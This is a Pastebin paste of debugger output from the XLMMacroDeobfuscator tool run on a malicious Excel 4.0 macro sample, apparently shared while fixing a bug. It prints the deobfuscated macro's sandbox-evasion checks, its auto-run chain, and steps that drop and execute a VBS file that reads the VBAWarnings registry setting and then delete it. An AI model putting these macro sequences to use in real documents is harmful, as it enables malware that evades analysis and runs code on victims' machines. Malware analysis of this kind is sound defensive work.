API tools faq
paste
dissectmalware

Sample - XLM - Bug Fixing

dissectmalware
Aug 16th, 2020
349
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.05 KB | None | 0 0
raw download clone embed print report
  1. #
  2.  
  3. C:\Users\user\AppData\Local\Programs\Python\Python38\python.exe "C:\Program Files\JetBrains\PyCharm 2020.2\plugins\python\helpers\pydev\pydevd.py" --multiproc --qt-support=auto --client 127.0.0.1 --port 50320 --file C:/Users/user/Documents/GitHub/XLMMacroDeobfuscator/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\samples\e778ee0ac55131192b71a180e55df087b4523143dd0eb80c8df95d98b80f3715.xls -n
  4. pydev debugger: process 8820 is connecting
  5.  
  6. Connected to pydev debugger (build 202.6397.98)
  7. pywin32 is not installed (only is required if you want to use MS Excel)
  8.  
  9. _ _______
  10. |\ /|( \ ( )
  11. ( \ / )| ( | () () |
  12. \ (_) / | | | || || |
  13. ) _ ( | | | |(_)| |
  14. / ( ) \ | | | | | |
  15. ( / \ )| (____/\| ) ( |
  16. |/ \|(_______/|/ \|
  17. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  18. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  19. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  20. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  21. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  22. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  23. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  24. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  25.  
  26.  
  27. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  28.  
  29. File: C:\Users\user\Downloads\samples\e778ee0ac55131192b71a180e55df087b4523143dd0eb80c8df95d98b80f3715.xls
  30.  
  31. Unencrypted xls file
  32.  
  33. [Loading Cells]
  34. auto_open: auto_open->BgGIL5lfRvUbzqcAWl!$CP$4895
  35. [Starting Deobfuscation]
  36. CELL:CP4895 , FullEvaluation , FORMULA("=CHAR(R[7373]C[-182])",BgGIL5lfRvUbzqcAWl$HG$24283:$HG$24364)
  37. CELL:CP4896 , FullEvaluation , "=FORMULA(R[-27647]C[-79],R[-24110]C[-93])"
  38. CELL:CP4897 , FullEvaluation , "=FORMULA(R[-42080]C[99],R[-25495]C[-44])"
  39. CELL:CP4898 , FullEvaluation , "=FORMULA(R[-34221]C[204],R[-30800]C[129])"
  40. CELL:CP4899 , FullEvaluation , ON.TIME(2020-08-16 06:09:32.742156,'BgGIL5lfRvUbzqcAWl'!EY31295)
  41. CELL:EY31295 , FullEvaluation , "=CLOSE(FALSE)"
  42. CELL:EY31296 , FullEvaluation , "=LEN(APP.MAXIMIZE())+140"
  43. CELL:EY31297 , FullEvaluation , "=LEN(GET.WINDOW(7))+-960"
  44. CELL:EY31298 , FullEvaluation , "=LEN(GET.WINDOW(20))+-58"
  45. CELL:EY31299 , FullEvaluation , "=LEN(GET.WINDOW(23)=3)+-671"
  46. CELL:EY31300 , FullEvaluation , "=LEN(GET.WORKSPACE(31))+-547"
  47. CELL:EY31301 , FullEvaluation , "=LEN(GET.WORKSPACE(13)>770)+-736"
  48. CELL:EY31302 , FullEvaluation , "=LEN(GET.WORKSPACE(14)>390)+-191"
  49. CELL:EY31303 , FullEvaluation , "=LEN(GET.WORKSPACE(19))+-718"
  50. CELL:EY31304 , FullEvaluation , "=LEN(GET.WORKSPACE(42))+-245"
  51. CELL:EY31305 , FullEvaluation , "=R34834C141+1022"
  52. CELL:EY31306 , FullEvaluation , "=R34839C141+297"
  53. CELL:EY31307 , FullEvaluation , "=R34833C141+-56"
  54. CELL:EY31308 , FullEvaluation , "=R34833C141+-23"
  55. CELL:EY31309 , FullEvaluation , "=R34837C141+617"
  56. CELL:EY31310 , FullEvaluation , "=R34833C141+-57"
  57. CELL:EY31311 , FullEvaluation , "=R34839C141+269"
  58. CELL:EY31312 , FullEvaluation , "=R34839C141+237"
  59. CELL:EY31313 , FullEvaluation , "=R34839C141+257"
  60. CELL:EY31314 , FullEvaluation , "=R34841C141+320"
  61. CELL:EY31315 , FullEvaluation , "=R34840C141+811"
  62. CELL:EY31316 , FullEvaluation , "=R34840C141+779"
  63. CELL:EY31317 , FullEvaluation , "=R34833C141+-40"
  64. CELL:EY31318 , FullEvaluation , "=R34834C141+1069"
  65. CELL:EY31319 , FullEvaluation , "=R34836C141+762"
  66. CELL:EY31320 , FullEvaluation , "=R34840C141+799"
  67. CELL:EY31321 , FullEvaluation , "=R34839C141+267"
  68. CELL:EY31322 , FullEvaluation , "=R34834C141+995"
  69. CELL:EY31323 , FullEvaluation , "=R34835C141+107"
  70. CELL:EY31324 , FullEvaluation , "=R34841C141+346"
  71. CELL:EY31325 , FullEvaluation , "=R34835C141+157"
  72. CELL:EY31326 , FullEvaluation , "=R34838C141+777"
  73. CELL:EY31327 , FullEvaluation , "=R34833C141+-78"
  74. CELL:EY31328 , FullEvaluation , "=R34841C141+310"
  75. CELL:EY31329 , FullEvaluation , "=R34835C141+138"
  76. CELL:EY31330 , FullEvaluation , "=R34841C141+357"
  77. CELL:EY31331 , FullEvaluation , "=R34837C141+653"
  78. CELL:EY31332 , FullEvaluation , "=R34835C141+145"
  79. CELL:EY31333 , FullEvaluation , "=R34835C141+111"
  80. CELL:EY31334 , FullEvaluation , "=R34833C141+-37"
  81. CELL:EY31335 , FullEvaluation , "=R34839C141+260"
  82. CELL:EY31336 , FullEvaluation , "=R34836C141+780"
  83. CELL:EY31337 , FullEvaluation , "=R34837C141+588"
  84. CELL:EY31338 , FullEvaluation , "=R34833C141+-43"
  85. CELL:EY31339 , FullEvaluation , "=R34838C141+781"
  86. CELL:EY31340 , FullEvaluation , "=R34833C141+-27"
  87. CELL:EY31341 , FullEvaluation , "=R34841C141+300"
  88. CELL:EY31342 , FullEvaluation , "=R34840C141+790"
  89. CELL:EY31343 , FullEvaluation , "=R34833C141+-96"
  90. CELL:EY31344 , FullEvaluation , "=R34836C141+710"
  91. CELL:EY31345 , FullEvaluation , "=R34835C141+156"
  92. CELL:EY31346 , FullEvaluation , "=R34835C141+92"
  93. CELL:EY31347 , FullEvaluation , "=R34840C141+746"
  94. CELL:EY31348 , FullEvaluation , "=R34838C141+854"
  95. CELL:EY31349 , FullEvaluation , "=R34841C141+319"
  96. CELL:EY31350 , FullEvaluation , "=R34836C141+757"
  97. CELL:EY31351 , FullEvaluation , "=R34838C141+830"
  98. CELL:EY31352 , FullEvaluation , "=R34837C141+600"
  99. CELL:EY31353 , FullEvaluation , "=R34839C141+299"
  100. CELL:EY31354 , FullEvaluation , "=R34835C141+140"
  101. CELL:EY31355 , FullEvaluation , "=R34838C141+847"
  102. CELL:EY31356 , FullEvaluation , "=R34838C141+809"
  103. CELL:EY31357 , FullEvaluation , "=R34834C141+1038"
  104. CELL:EY31358 , FullEvaluation , "=R34836C141+739"
  105. CELL:EY31359 , FullEvaluation , "=R34839C141+306"
  106. CELL:EY31360 , FullEvaluation , "=R34837C141+594"
  107. CELL:EY31361 , FullEvaluation , "=R34839C141+255"
  108. CELL:EY31362 , FullEvaluation , "=R34834C141+1006"
  109. CELL:EY31363 , FullEvaluation , "=R34840C141+776"
  110. CELL:EY31364 , FullEvaluation , "=R34838C141+813"
  111. CELL:EY31365 , FullEvaluation , "=R34837C141+642"
  112. CELL:EY31366 , FullEvaluation , "=R34836C141+776"
  113. CELL:EY31367 , FullEvaluation , "=R34836C141+775"
  114. CELL:EY31368 , FullEvaluation , "=R34839C141+261"
  115. CELL:EY31369 , FullEvaluation , "=R34835C141+88"
  116. CELL:EY31370 , FullEvaluation , "=R34837C141+641"
  117. CELL:EY31371 , FullEvaluation , "=R34835C141+101"
  118. CELL:EY31372 , FullEvaluation , "=R34841C141+280"
  119. CELL:EY31373 , FullEvaluation , "=R34838C141+824"
  120. CELL:EY31374 , FullEvaluation , "=R34836C141+773"
  121. CELL:EY31375 , FullEvaluation , "=R34840C141+769"
  122. CELL:EY31376 , FullEvaluation , "=R34841C141+282"
  123. CELL:EY31377 , FullEvaluation , "=R34833C141+-26"
  124. CELL:EY31378 , FullEvaluation , "=R34841C141+285"
  125. CELL:EY31379 , FullEvaluation , "=R34838C141+852"
  126. CELL:EY31380 , FullEvaluation , "=R34841C141+312"
  127. CELL:EY31381 , FullEvaluation , "=R34840C141+768"
  128. CELL:EY31382 , FullEvaluation , "=R34837C141+602"
  129. CELL:EY31383 , FullEvaluation , "=R34841C141+334"
  130. CELL:EY31384 , FullEvaluation , "=R34840C141+803"
  131. CELL:EY31385 , FullEvaluation , "=R34835C141+110"
  132. CELL:EY31386 , FullEvaluation , "=R34841C141+302"
  133. CELL:EY31387 , FullEvaluation , "=FORMULA.FILL(""=CHAR(R[30246]C[-23])"",R4596C164:R4677C164)"
  134. CELL:EY31388 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R34832C141))"
  135. CELL:EY31389 , FullEvaluation , "=""C:\Users\Public\Bcy75IXg.vbs"""
  136. CELL:EY31390 , FullEvaluation , "=""C:\Users\Public\h9W.txt"""
  137. CELL:EY31391 , FullEvaluation , "=FOPEN(R34926C141,3)"
  138. CELL:EY31392 , FullEvaluation , "=FWRITELN(R34928C141,""On Error Resume Next"")"
  139. CELL:EY31393 , FullEvaluation , "=FWRITELN(R34928C141,""Set ggLxt = CreateObject(""""WScript.Shell"""")"")"
  140. CELL:EY31394 , FullEvaluation , "=FWRITELN(R34928C141,""Set JJ0Vlx = CreateObject(""""Scripting.FileSystemObject"""")"")"
  141. CELL:EY31395 , FullEvaluation , "=FWRITELN(R34928C141,""Set KEPJk = JJ0Vlx.CreateTextFile(""""""&R34927C141&"""""", True)"")"
  142. CELL:EY31396 , FullEvaluation , "=FWRITELN(R34928C141,""KEPJk.WriteLine(ggLxt.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  143. CELL:EY31397 , FullEvaluation , "=FWRITELN(R34928C141,""KEPJk.Close"")"
  144. CELL:EY31398 , FullEvaluation , "=FCLOSE(R34928C141)"
  145. CELL:EY31399 , FullEvaluation , "=EXEC(""explorer.exe ""&R34926C141&"""")"
  146. CELL:EY31400 , FullEvaluation , "=WHILE(ISERROR(FILES(R34927C141)))"
  147. CELL:EY31401 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  148. CELL:EY31402 , FullEvaluation , "=NEXT()"
  149. CELL:EY31403 , FullEvaluation , "=FILE.DELETE(R34926C141)"
  150. CELL:EY31404 , FullEvaluation , "=FOPEN(R34927C141,2)"
  151. CELL:EY31405 , FullEvaluation , "=FREAD(R34941C141,100)"
  152. CELL:EY31406 , FullEvaluation , "=FCLOSE(R34941C141)"
  153. CELL:EY31407 , FullEvaluation , "=FILE.DELETE(R34927C141)"
  154. CELL:EY31408 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R34942C141)),GOTO(R34832C141),)"
  155. CELL:EY31409 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))"
  156. CELL:EY31410 , FullEvaluation , ON.TIME(2020-08-16 06:09:33.175459,'BgGIL5lfRvUbzqcAWl'!HZ58941)
  157. CELL:HZ58941 , FullEvaluation , FORMULA("=FORMULA(R[-27647]C[-79],R[-24110]C[-93])",BgGIL5lfRvUbzqcAWl$HZ$58942:$HZ$59056)
  158. CELL:HZ58942 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-24110]C[-93])
  159. CELL:HZ58943 , FullEvaluation , FORMULA("=LEN(APP.MAXIMIZE())+140",R[-24110]C[-93])
  160. CELL:HZ58944 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(7))+-960",R[-24110]C[-93])
  161. CELL:HZ58945 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(20))+-58",R[-24110]C[-93])
  162. CELL:HZ58946 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(23)=3)+-671",R[-24110]C[-93])
  163. CELL:HZ58947 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(31))+-547",R[-24110]C[-93])
  164. CELL:HZ58948 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(13)>770)+-736",R[-24110]C[-93])
  165. CELL:HZ58949 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(14)>390)+-191",R[-24110]C[-93])
  166. CELL:HZ58950 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(19))+-718",R[-24110]C[-93])
  167. CELL:HZ58951 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(42))+-245",R[-24110]C[-93])
  168. CELL:HZ58952 , FullEvaluation , FORMULA("=R34834C141+1022",R[-24110]C[-93])
  169. CELL:HZ58953 , FullEvaluation , FORMULA("=R34839C141+297",R[-24110]C[-93])
  170. CELL:HZ58954 , FullEvaluation , FORMULA("=R34833C141+-56",R[-24110]C[-93])
  171. CELL:HZ58955 , FullEvaluation , FORMULA("=R34833C141+-23",R[-24110]C[-93])
  172. CELL:HZ58956 , FullEvaluation , FORMULA("=R34837C141+617",R[-24110]C[-93])
  173. CELL:HZ58957 , FullEvaluation , FORMULA("=R34833C141+-57",R[-24110]C[-93])
  174. CELL:HZ58958 , FullEvaluation , FORMULA("=R34839C141+269",R[-24110]C[-93])
  175. CELL:HZ58959 , FullEvaluation , FORMULA("=R34839C141+237",R[-24110]C[-93])
  176. CELL:HZ58960 , FullEvaluation , FORMULA("=R34839C141+257",R[-24110]C[-93])
  177. CELL:HZ58961 , FullEvaluation , FORMULA("=R34841C141+320",R[-24110]C[-93])
  178. CELL:HZ58962 , FullEvaluation , FORMULA("=R34840C141+811",R[-24110]C[-93])
  179. CELL:HZ58963 , FullEvaluation , FORMULA("=R34840C141+779",R[-24110]C[-93])
  180. CELL:HZ58964 , FullEvaluation , FORMULA("=R34833C141+-40",R[-24110]C[-93])
  181. CELL:HZ58965 , FullEvaluation , FORMULA("=R34834C141+1069",R[-24110]C[-93])
  182. CELL:HZ58966 , FullEvaluation , FORMULA("=R34836C141+762",R[-24110]C[-93])
  183. CELL:HZ58967 , FullEvaluation , FORMULA("=R34840C141+799",R[-24110]C[-93])
  184. CELL:HZ58968 , FullEvaluation , FORMULA("=R34839C141+267",R[-24110]C[-93])
  185. CELL:HZ58969 , FullEvaluation , FORMULA("=R34834C141+995",R[-24110]C[-93])
  186. CELL:HZ58970 , FullEvaluation , FORMULA("=R34835C141+107",R[-24110]C[-93])
  187. CELL:HZ58971 , FullEvaluation , FORMULA("=R34841C141+346",R[-24110]C[-93])
  188. CELL:HZ58972 , FullEvaluation , FORMULA("=R34835C141+157",R[-24110]C[-93])
  189. CELL:HZ58973 , FullEvaluation , FORMULA("=R34838C141+777",R[-24110]C[-93])
  190. CELL:HZ58974 , FullEvaluation , FORMULA("=R34833C141+-78",R[-24110]C[-93])
  191. CELL:HZ58975 , FullEvaluation , FORMULA("=R34841C141+310",R[-24110]C[-93])
  192. CELL:HZ58976 , FullEvaluation , FORMULA("=R34835C141+138",R[-24110]C[-93])
  193. CELL:HZ58977 , FullEvaluation , FORMULA("=R34841C141+357",R[-24110]C[-93])
  194. CELL:HZ58978 , FullEvaluation , FORMULA("=R34837C141+653",R[-24110]C[-93])
  195. CELL:HZ58979 , FullEvaluation , FORMULA("=R34835C141+145",R[-24110]C[-93])
  196. CELL:HZ58980 , FullEvaluation , FORMULA("=R34835C141+111",R[-24110]C[-93])
  197. CELL:HZ58981 , FullEvaluation , FORMULA("=R34833C141+-37",R[-24110]C[-93])
  198. CELL:HZ58982 , FullEvaluation , FORMULA("=R34839C141+260",R[-24110]C[-93])
  199. CELL:HZ58983 , FullEvaluation , FORMULA("=R34836C141+780",R[-24110]C[-93])
  200. CELL:HZ58984 , FullEvaluation , FORMULA("=R34837C141+588",R[-24110]C[-93])
  201. CELL:HZ58985 , FullEvaluation , FORMULA("=R34833C141+-43",R[-24110]C[-93])
  202. CELL:HZ58986 , FullEvaluation , FORMULA("=R34838C141+781",R[-24110]C[-93])
  203. CELL:HZ58987 , FullEvaluation , FORMULA("=R34833C141+-27",R[-24110]C[-93])
  204. CELL:HZ58988 , FullEvaluation , FORMULA("=R34841C141+300",R[-24110]C[-93])
  205. CELL:HZ58989 , FullEvaluation , FORMULA("=R34840C141+790",R[-24110]C[-93])
  206. CELL:HZ58990 , FullEvaluation , FORMULA("=R34833C141+-96",R[-24110]C[-93])
  207. CELL:HZ58991 , FullEvaluation , FORMULA("=R34836C141+710",R[-24110]C[-93])
  208. CELL:HZ58992 , FullEvaluation , FORMULA("=R34835C141+156",R[-24110]C[-93])
  209. CELL:HZ58993 , FullEvaluation , FORMULA("=R34835C141+92",R[-24110]C[-93])
  210. CELL:HZ58994 , FullEvaluation , FORMULA("=R34840C141+746",R[-24110]C[-93])
  211. CELL:HZ58995 , FullEvaluation , FORMULA("=R34838C141+854",R[-24110]C[-93])
  212. CELL:HZ58996 , FullEvaluation , FORMULA("=R34841C141+319",R[-24110]C[-93])
  213. CELL:HZ58997 , FullEvaluation , FORMULA("=R34836C141+757",R[-24110]C[-93])
  214. CELL:HZ58998 , FullEvaluation , FORMULA("=R34838C141+830",R[-24110]C[-93])
  215. CELL:HZ58999 , FullEvaluation , FORMULA("=R34837C141+600",R[-24110]C[-93])
  216. CELL:HZ59000 , FullEvaluation , FORMULA("=R34839C141+299",R[-24110]C[-93])
  217. CELL:HZ59001 , FullEvaluation , FORMULA("=R34835C141+140",R[-24110]C[-93])
  218. CELL:HZ59002 , FullEvaluation , FORMULA("=R34838C141+847",R[-24110]C[-93])
  219. CELL:HZ59003 , FullEvaluation , FORMULA("=R34838C141+809",R[-24110]C[-93])
  220. CELL:HZ59004 , FullEvaluation , FORMULA("=R34834C141+1038",R[-24110]C[-93])
  221. CELL:HZ59005 , FullEvaluation , FORMULA("=R34836C141+739",R[-24110]C[-93])
  222. CELL:HZ59006 , FullEvaluation , FORMULA("=R34839C141+306",R[-24110]C[-93])
  223. CELL:HZ59007 , FullEvaluation , FORMULA("=R34837C141+594",R[-24110]C[-93])
  224. CELL:HZ59008 , FullEvaluation , FORMULA("=R34839C141+255",R[-24110]C[-93])
  225. CELL:HZ59009 , FullEvaluation , FORMULA("=R34834C141+1006",R[-24110]C[-93])
  226. CELL:HZ59010 , FullEvaluation , FORMULA("=R34840C141+776",R[-24110]C[-93])
  227. CELL:HZ59011 , FullEvaluation , FORMULA("=R34838C141+813",R[-24110]C[-93])
  228. CELL:HZ59012 , FullEvaluation , FORMULA("=R34837C141+642",R[-24110]C[-93])
  229. CELL:HZ59013 , FullEvaluation , FORMULA("=R34836C141+776",R[-24110]C[-93])
  230. CELL:HZ59014 , FullEvaluation , FORMULA("=R34836C141+775",R[-24110]C[-93])
  231. CELL:HZ59015 , FullEvaluation , FORMULA("=R34839C141+261",R[-24110]C[-93])
  232. CELL:HZ59016 , FullEvaluation , FORMULA("=R34835C141+88",R[-24110]C[-93])
  233. CELL:HZ59017 , FullEvaluation , FORMULA("=R34837C141+641",R[-24110]C[-93])
  234. CELL:HZ59018 , FullEvaluation , FORMULA("=R34835C141+101",R[-24110]C[-93])
  235. CELL:HZ59019 , FullEvaluation , FORMULA("=R34841C141+280",R[-24110]C[-93])
  236. CELL:HZ59020 , FullEvaluation , FORMULA("=R34838C141+824",R[-24110]C[-93])
  237. CELL:HZ59021 , FullEvaluation , FORMULA("=R34836C141+773",R[-24110]C[-93])
  238. CELL:HZ59022 , FullEvaluation , FORMULA("=R34840C141+769",R[-24110]C[-93])
  239. CELL:HZ59023 , FullEvaluation , FORMULA("=R34841C141+282",R[-24110]C[-93])
  240. CELL:HZ59024 , FullEvaluation , FORMULA("=R34833C141+-26",R[-24110]C[-93])
  241. CELL:HZ59025 , FullEvaluation , FORMULA("=R34841C141+285",R[-24110]C[-93])
  242. CELL:HZ59026 , FullEvaluation , FORMULA("=R34838C141+852",R[-24110]C[-93])
  243. CELL:HZ59027 , FullEvaluation , FORMULA("=R34841C141+312",R[-24110]C[-93])
  244. CELL:HZ59028 , FullEvaluation , FORMULA("=R34840C141+768",R[-24110]C[-93])
  245. CELL:HZ59029 , FullEvaluation , FORMULA("=R34837C141+602",R[-24110]C[-93])
  246. CELL:HZ59030 , FullEvaluation , FORMULA("=R34841C141+334",R[-24110]C[-93])
  247. CELL:HZ59031 , FullEvaluation , FORMULA("=R34840C141+803",R[-24110]C[-93])
  248. CELL:HZ59032 , FullEvaluation , FORMULA("=R34835C141+110",R[-24110]C[-93])
  249. CELL:HZ59033 , FullEvaluation , FORMULA("=R34841C141+302",R[-24110]C[-93])
  250. CELL:HZ59034 , FullEvaluation , FORMULA("=FORMULA.FILL(""=CHAR(R[30246]C[-23])"",R4596C164:R4677C164)",R[-24110]C[-93])
  251. CELL:HZ59035 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R34832C141))",R[-24110]C[-93])
  252. CELL:HZ59036 , FullEvaluation , FORMULA("=""C:\Users\Public\Bcy75IXg.vbs""",R[-24110]C[-93])
  253. CELL:HZ59037 , FullEvaluation , FORMULA("=""C:\Users\Public\h9W.txt""",R[-24110]C[-93])
  254. CELL:HZ59038 , FullEvaluation , FORMULA("=FOPEN(R34926C141,3)",R[-24110]C[-93])
  255. CELL:HZ59039 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""On Error Resume Next"")",R[-24110]C[-93])
  256. CELL:HZ59040 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set ggLxt = CreateObject(""""WScript.Shell"""")"")",R[-24110]C[-93])
  257. CELL:HZ59041 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set JJ0Vlx = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-24110]C[-93])
  258. CELL:HZ59042 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set KEPJk = JJ0Vlx.CreateTextFile(""""""&R34927C141&"""""", True)"")",R[-24110]C[-93])
  259. CELL:HZ59043 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""KEPJk.WriteLine(ggLxt.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-24110]C[-93])
  260. CELL:HZ59044 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""KEPJk.Close"")",R[-24110]C[-93])
  261. CELL:HZ59045 , FullEvaluation , FORMULA("=FCLOSE(R34928C141)",R[-24110]C[-93])
  262. CELL:HZ59046 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R34926C141&"""")",R[-24110]C[-93])
  263. CELL:HZ59047 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R34927C141)))",R[-24110]C[-93])
  264. CELL:HZ59048 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-24110]C[-93])
  265. CELL:HZ59049 , FullEvaluation , FORMULA("=NEXT()",R[-24110]C[-93])
  266. CELL:HZ59050 , FullEvaluation , FORMULA("=FILE.DELETE(R34926C141)",R[-24110]C[-93])
  267. CELL:HZ59051 , FullEvaluation , FORMULA("=FOPEN(R34927C141,2)",R[-24110]C[-93])
  268. CELL:HZ59052 , FullEvaluation , FORMULA("=FREAD(R34941C141,100)",R[-24110]C[-93])
  269. CELL:HZ59053 , FullEvaluation , FORMULA("=FCLOSE(R34941C141)",R[-24110]C[-93])
  270. CELL:HZ59054 , FullEvaluation , FORMULA("=FILE.DELETE(R34927C141)",R[-24110]C[-93])
  271. CELL:HZ59055 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R34942C141)),GOTO(R34832C141),)",R[-24110]C[-93])
  272. CELL:HZ59056 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))",R[-24110]C[-93])
  273. CELL:HZ59057 , FullEvaluation , ON.TIME(2020-08-16 06:09:33.276218,'BgGIL5lfRvUbzqcAWl'!EK34833)
  274. CELL:EK34833 , FullEvaluation , 144
  275. CELL:EK34834 , FullEvaluation , -955
  276. CELL:EK34835 , FullEvaluation , -54
  277. CELL:EK34836 , FullEvaluation , -667
  278. CELL:EK34837 , FullEvaluation , -542
  279. CELL:EK34838 , FullEvaluation , -732
  280. CELL:EK34839 , FullEvaluation , -187
  281. CELL:EK34840 , FullEvaluation , -714
  282. CELL:EK34841 , FullEvaluation , -241
  283. CELL:EK34842 , FullEvaluation , 67
  284. CELL:EK34843 , FullEvaluation , 110
  285. CELL:EK34844 , FullEvaluation , 88
  286. CELL:EK34845 , FullEvaluation , 121
  287. CELL:EK34846 , FullEvaluation , 75
  288. CELL:EK34847 , FullEvaluation , 87
  289. CELL:EK34848 , FullEvaluation , 82
  290. CELL:EK34849 , FullEvaluation , 50
  291. CELL:EK34850 , FullEvaluation , 70
  292. CELL:EK34851 , FullEvaluation , 79
  293. CELL:EK34852 , FullEvaluation , 97
  294. CELL:EK34853 , FullEvaluation , 65
  295. CELL:EK34854 , FullEvaluation , 104
  296. CELL:EK34855 , FullEvaluation , 114
  297. CELL:EK34856 , FullEvaluation , 95
  298. CELL:EK34857 , FullEvaluation , 85
  299. CELL:EK34858 , FullEvaluation , 80
  300. CELL:EK34859 , FullEvaluation , 40
  301. CELL:EK34860 , FullEvaluation , 53
  302. CELL:EK34861 , FullEvaluation , 105
  303. CELL:EK34862 , FullEvaluation , 103
  304. CELL:EK34863 , FullEvaluation , 45
  305. CELL:EK34864 , FullEvaluation , 66
  306. CELL:EK34865 , FullEvaluation , 69
  307. CELL:EK34866 , FullEvaluation , 84
  308. CELL:EK34867 , FullEvaluation , 116
  309. CELL:EK34868 , FullEvaluation , 111
  310. CELL:EK34869 , FullEvaluation , 91
  311. CELL:EK34870 , FullEvaluation , 57
  312. CELL:EK34871 , FullEvaluation , 107
  313. CELL:EK34872 , FullEvaluation , 73
  314. CELL:EK34873 , FullEvaluation , 113
  315. CELL:EK34874 , FullEvaluation , 46
  316. CELL:EK34875 , FullEvaluation , 101
  317. CELL:EK34876 , FullEvaluation , 49
  318. CELL:EK34877 , FullEvaluation , 117
  319. CELL:EK34878 , FullEvaluation , 59
  320. CELL:EK34879 , FullEvaluation , 76
  321. CELL:EK34880 , FullEvaluation , 48
  322. CELL:EK34881 , FullEvaluation , 43
  323. CELL:EK34882 , FullEvaluation , 102
  324. CELL:EK34883 , FullEvaluation , 38
  325. CELL:EK34884 , FullEvaluation , 32
  326. CELL:EK34885 , FullEvaluation , 122
  327. CELL:EK34886 , FullEvaluation , 78
  328. CELL:EK34887 , FullEvaluation , 90
  329. CELL:EK34888 , FullEvaluation , 98
  330. CELL:EK34889 , FullEvaluation , 58
  331. CELL:EK34890 , FullEvaluation , 112
  332. CELL:EK34891 , FullEvaluation , 86
  333. CELL:EK34892 , FullEvaluation , 115
  334. CELL:EK34893 , FullEvaluation , 77
  335. CELL:EK34894 , FullEvaluation , 83
  336. CELL:EK34895 , FullEvaluation , 72
  337. CELL:EK34896 , FullEvaluation , 119
  338. CELL:EK34897 , FullEvaluation , 52
  339. CELL:EK34898 , FullEvaluation , 68
  340. CELL:EK34899 , FullEvaluation , 51
  341. CELL:EK34900 , FullEvaluation , 62
  342. CELL:EK34901 , FullEvaluation , 81
  343. CELL:EK34902 , FullEvaluation , 100
  344. CELL:EK34903 , FullEvaluation , 109
  345. CELL:EK34904 , FullEvaluation , 108
  346. CELL:EK34905 , FullEvaluation , 74
  347. CELL:EK34906 , FullEvaluation , 34
  348. CELL:EK34907 , FullEvaluation , 99
  349. CELL:EK34908 , FullEvaluation , 47
  350. CELL:EK34909 , FullEvaluation , 39
  351. CELL:EK34910 , FullEvaluation , 92
  352. CELL:EK34911 , FullEvaluation , 106
  353. CELL:EK34912 , FullEvaluation , 55
  354. CELL:EK34913 , FullEvaluation , 41
  355. CELL:EK34914 , FullEvaluation , 118
  356. CELL:EK34915 , FullEvaluation , 44
  357. CELL:EK34916 , FullEvaluation , 120
  358. CELL:EK34917 , FullEvaluation , 71
  359. CELL:EK34918 , FullEvaluation , 54
  360. CELL:EK34919 , FullEvaluation , 60
  361. CELL:EK34920 , FullEvaluation , 93
  362. CELL:EK34921 , FullEvaluation , 89
  363. CELL:EK34922 , FullEvaluation , 56
  364. CELL:EK34923 , FullEvaluation , 61
  365. CELL:EK34924 , FullEvaluation , FORMULA("=CHAR(R[30246]C[-23])",R4596C164:R4677C164)
  366. CELL:EK34925 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R34832C141))
  367. CELL:EK34925 , FullEvaluation , [TRUE]
  368. CELL:EK34926 , FullEvaluation , "C:\Users\Public\Bcy75IXg.vbs"
  369. CELL:EK34927 , FullEvaluation , "C:\Users\Public\h9W.txt"
  370. CELL:EK34928 , FullEvaluation , FOPEN("C:\Users\Public\Bcy75IXg.vbs",3)
  371. CELL:EK34929 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","On Error Resume Next")
  372. CELL:EK34930 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set ggLxt = CreateObject(""WScript.Shell"")")
